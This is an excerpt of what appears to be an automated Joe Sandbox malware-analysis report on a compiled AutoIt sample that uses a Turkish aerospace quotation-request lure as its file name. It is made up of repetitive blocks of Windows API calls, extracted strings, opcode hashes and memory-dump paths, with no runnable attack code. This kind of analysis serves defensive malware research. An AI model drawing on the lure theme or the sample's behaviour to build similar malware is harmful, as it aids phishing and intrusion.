                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                    • API String ID: 169749273-3440237614
                                                                                                                                    • Opcode ID: 905ad42e031f711aff6e761eb653bafcb7fea7ed78091f7bcc612093ee68620b
                                                                                                                                    • Instruction ID: bbf90f7753c11733a0ba7c42b59dbc002f193c2d3b3863138e8607b5aa94773f
                                                                                                                                    • Opcode Fuzzy Hash: 905ad42e031f711aff6e761eb653bafcb7fea7ed78091f7bcc612093ee68620b
                                                                                                                                    • Instruction Fuzzy Hash: AA618971108301AFC721EF64CD89DAFBBF8EF89790F40091EF591961A1DB75AA09CB52
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 01007D5F
                                                                                                                                    • VariantCopy.OLEAUT32(00000000,?), ref: 01007D68
                                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 01007D74
                                                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 01007E62
                                                                                                                                    • __swprintf.LIBCMT ref: 01007E92
                                                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 01007EBE
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 01007F6F
                                                                                                                                    • SysFreeString.OLEAUT32(00000016), ref: 01008003
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0100805D
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0100806C
                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 010080AA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                    • API String ID: 3730832054-3931177956
                                                                                                                                    • Opcode ID: a12015d819c61eba3dfcc2ad2443f4c9263df296cdb3477f965041b215e6e9f1
                                                                                                                                    • Instruction ID: 5f548e299a20e85432d15b954f98158a2e76a48fd5996325dd75f14e13446be8
                                                                                                                                    • Opcode Fuzzy Hash: a12015d819c61eba3dfcc2ad2443f4c9263df296cdb3477f965041b215e6e9f1
                                                                                                                                    • Instruction Fuzzy Hash: DCD1E571A00616EBEB62EF65D844BBEB7B4BF05300F10845AE5C59B2C4CF79B850CBA1
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 01024424
                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0102446F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                                    • Opcode ID: b950b68c7f07e162fc809a218b0f94b1c5b1582398a0d9e7f1c8b4c88d6fe4a0
                                                                                                                                    • Instruction ID: 6eb81fafaeff192eb595c75e87c44eaa761bbe4969cde4d81dfb57065fe82c38
                                                                                                                                    • Opcode Fuzzy Hash: b950b68c7f07e162fc809a218b0f94b1c5b1582398a0d9e7f1c8b4c88d6fe4a0
                                                                                                                                    • Instruction Fuzzy Hash: 97918D70208311DBCB14EF14C851A6EB7E1AF95354F44486CF8D69B3A2CB79ED0ADB81
                                                                                                                                    APIs
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0102B8B4
                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,010291C2), ref: 0102B910
                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0102B949
                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0102B98C
                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0102B9C3
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0102B9CF
                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0102B9DF
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,010291C2), ref: 0102B9EE
                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0102BA0B
                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0102BA17
                                                                                                                                      • Part of subcall function 00FC2EFD: __wcsicmp_l.LIBCMT ref: 00FC2F86
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                    • API String ID: 1212759294-1154884017
                                                                                                                                    • Opcode ID: a1cfe9969c4fd18691c8b2422453f320c7c01688ddf2400fab1f7e88f3466f46
                                                                                                                                    • Instruction ID: f4c6298fcac7a0ee133e842943daf9e8f11c819c038c2702579c947b01983f89
                                                                                                                                    • Opcode Fuzzy Hash: a1cfe9969c4fd18691c8b2422453f320c7c01688ddf2400fab1f7e88f3466f46
                                                                                                                                    • Instruction Fuzzy Hash: 72610171A00226BEEB24DF68CD41FBE7BB8FB08710F10415AF955D60C1DBB99A80D7A0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0100A3CB
                                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0100A418
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A460
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A497
                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0100A4C5
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                    • API String ID: 2698844021-4113822522
                                                                                                                                    • Opcode ID: e2d8fd24ae51a81888ece7767b7f130fc1cc5011e36eed964a1d182b15f6d5c8
                                                                                                                                    • Instruction ID: 9435004e647be50d3f50ec2f71fed8ca613d0cb73bdca316e4397df2ad22becb
                                                                                                                                    • Opcode Fuzzy Hash: e2d8fd24ae51a81888ece7767b7f130fc1cc5011e36eed964a1d182b15f6d5c8
                                                                                                                                    • Instruction Fuzzy Hash: CD5158B52083059FD740EF25CC81C6BB7E4EF89758F40886DF89657291DB39AD0ACB52
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00FDE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00FFF8DF
                                                                                                                                    • LoadStringW.USER32(00000000,?,00FDE029,00000001), ref: 00FFF8E8
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,01065310,?,00000FFF,?,?,00FDE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00FFF90A
                                                                                                                                    • LoadStringW.USER32(00000000,?,00FDE029,00000001), ref: 00FFF90D
                                                                                                                                    • __swprintf.LIBCMT ref: 00FFF95D
                                                                                                                                    • __swprintf.LIBCMT ref: 00FFF96E
                                                                                                                                    • _wprintf.LIBCMT ref: 00FFFA17
                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FFFA2E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                    • API String ID: 984253442-2268648507
                                                                                                                                    • Opcode ID: 68bf985a9297f7ac439eeac1cbef5f1b4a4d303da2cfac96d122b1f06d734552
                                                                                                                                    • Instruction ID: 5bf6d4a4bfdd4942583570344cb57abc2cf1407992f0dc545256fdeb2f723ee0
                                                                                                                                    • Opcode Fuzzy Hash: 68bf985a9297f7ac439eeac1cbef5f1b4a4d303da2cfac96d122b1f06d734552
                                                                                                                                    • Instruction Fuzzy Hash: 8C4141B280020DAACF14FBE1DD46EFE7778AF19750F500065F505B60A6EA395F09EB61
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,01029207,?,?), ref: 0102BA56
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA6D
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA78
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA85
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0102BA8E
                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BA9D
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0102BAA6
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BAAD
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,01029207,?,?,00000000,?), ref: 0102BABE
                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,01032CAC,?), ref: 0102BAD7
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0102BAE7
                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0102BB0B
                                                                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0102BB36
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0102BB5E
                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0102BB74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                    • Opcode ID: 04cc988f9ae39c0626d09035e5536cc252ab3677eda1e7f9bf49655f6ed5fb6f
                                                                                                                                    • Instruction ID: 36033b594e037670671f26d11816b3aa2419514da74af7cd98395fa28b11baad
                                                                                                                                    • Opcode Fuzzy Hash: 04cc988f9ae39c0626d09035e5536cc252ab3677eda1e7f9bf49655f6ed5fb6f
                                                                                                                                    • Instruction Fuzzy Hash: 7C414975600219AFDB319F69DC88EAABBBCFF8AB51F208058F985D7254C7759901CB20
                                                                                                                                    APIs
                                                                                                                                    • __wsplitpath.LIBCMT ref: 0100DA10
                                                                                                                                    • _wcscat.LIBCMT ref: 0100DA28
                                                                                                                                    • _wcscat.LIBCMT ref: 0100DA3A
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0100DA4F
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0100DA63
                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0100DA7B
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0100DA95
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0100DAA7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 34673085-438819550
                                                                                                                                    • Opcode ID: 5133096c73bb394d2cefa7c789d6c249250ecd8aacc8c712686368bba354b8ce
                                                                                                                                    • Instruction ID: fe8c4ef83098e063d4bd0160d329f1010063ef6e6c27cefd1c17a0c3facb2501
                                                                                                                                    • Opcode Fuzzy Hash: 5133096c73bb394d2cefa7c789d6c249250ecd8aacc8c712686368bba354b8ce
                                                                                                                                    • Instruction Fuzzy Hash: C881B4715083419FEB65DFE8C840A6EB7E5BF89310F18486EF9C9C7291EA34D944CB62
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0102C1FC
                                                                                                                                    • GetFocus.USER32 ref: 0102C20C
                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0102C217
                                                                                                                                    • _memset.LIBCMT ref: 0102C342
                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0102C36D
                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0102C38D
                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0102C3A0
                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0102C3D4
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0102C41C
                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0102C454
                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0102C489
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                                    • Opcode ID: 4ad878c764b697af50318f5c5ab6fd639a2dc44ca80a78384a79aee1a78ed5b8
                                                                                                                                    • Instruction ID: 0d61fff6ad76c9139b661fa4f894d31c0b43b5ffd0f828d7fb1c9d76b8b1b5c5
                                                                                                                                    • Opcode Fuzzy Hash: 4ad878c764b697af50318f5c5ab6fd639a2dc44ca80a78384a79aee1a78ed5b8
                                                                                                                                    • Instruction Fuzzy Hash: EB81A0702083219FE721CF18CA84A6FBBE8FB89354F10495EFAC597251CB35D905CB52
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 0101738F
                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0101739B
                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 010173A7
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 010173B4
                                                                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01017408
                                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01017444
                                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01017468
                                                                                                                                    • SelectObject.GDI32(00000006,?), ref: 01017470
                                                                                                                                    • DeleteObject.GDI32(?), ref: 01017479
                                                                                                                                    • DeleteDC.GDI32(00000006), ref: 01017480
                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0101748B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                    • String ID: (
                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                    • Opcode ID: 4fa87db84af6e118584dd19f72ae57ff1525306a2504115b22cbe954183b7b91
                                                                                                                                    • Instruction ID: 99f1ccfde12f5bb7b14fe2fbe3a002fc6d4749c569d77a8adc0371bc1455b305
                                                                                                                                    • Opcode Fuzzy Hash: 4fa87db84af6e118584dd19f72ae57ff1525306a2504115b22cbe954183b7b91
                                                                                                                                    • Instruction Fuzzy Hash: 46514C7590030AEFDB25CFA8C885EAEBBF9EF48350F14851DF99A97214C739A940CB50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FA6B0C,?,00008000), ref: 00FC0973
                                                                                                                                      • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA6BAD
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA6CFA
                                                                                                                                      • Part of subcall function 00FA586D: _wcscpy.LIBCMT ref: 00FA58A5
                                                                                                                                      • Part of subcall function 00FC363D: _iswctype.LIBCMT ref: 00FC3645
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                    • API String ID: 537147316-1018226102
                                                                                                                                    • Opcode ID: 464ea72739d21d050d9e54498fcffc8e3e9c29c08f26c16fbdc3481e83595b4c
                                                                                                                                    • Instruction ID: 77bfcd2909d3f3373090ba36955edf52ee3717405e4775e2c52d2d6449b24502
                                                                                                                                    • Opcode Fuzzy Hash: 464ea72739d21d050d9e54498fcffc8e3e9c29c08f26c16fbdc3481e83595b4c
                                                                                                                                    • Instruction Fuzzy Hash: 4D02CFB15083419FC724EF20C881AAFBBE6EF96354F08481EF4D5972A1DB34D949EB42
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 01002D50
                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 01002DDD
                                                                                                                                    • GetMenuItemCount.USER32(01065890), ref: 01002E66
                                                                                                                                    • DeleteMenu.USER32(01065890,00000005,00000000,000000F5,?,?), ref: 01002EF6
                                                                                                                                    • DeleteMenu.USER32(01065890,00000004,00000000), ref: 01002EFE
                                                                                                                                    • DeleteMenu.USER32(01065890,00000006,00000000), ref: 01002F06
                                                                                                                                    • DeleteMenu.USER32(01065890,00000003,00000000), ref: 01002F0E
                                                                                                                                    • GetMenuItemCount.USER32(01065890), ref: 01002F16
                                                                                                                                    • SetMenuItemInfoW.USER32(01065890,00000004,00000000,00000030), ref: 01002F4C
                                                                                                                                    • GetCursorPos.USER32(?), ref: 01002F56
                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 01002F5F
                                                                                                                                    • TrackPopupMenuEx.USER32(01065890,00000000,?,00000000,00000000,00000000), ref: 01002F72
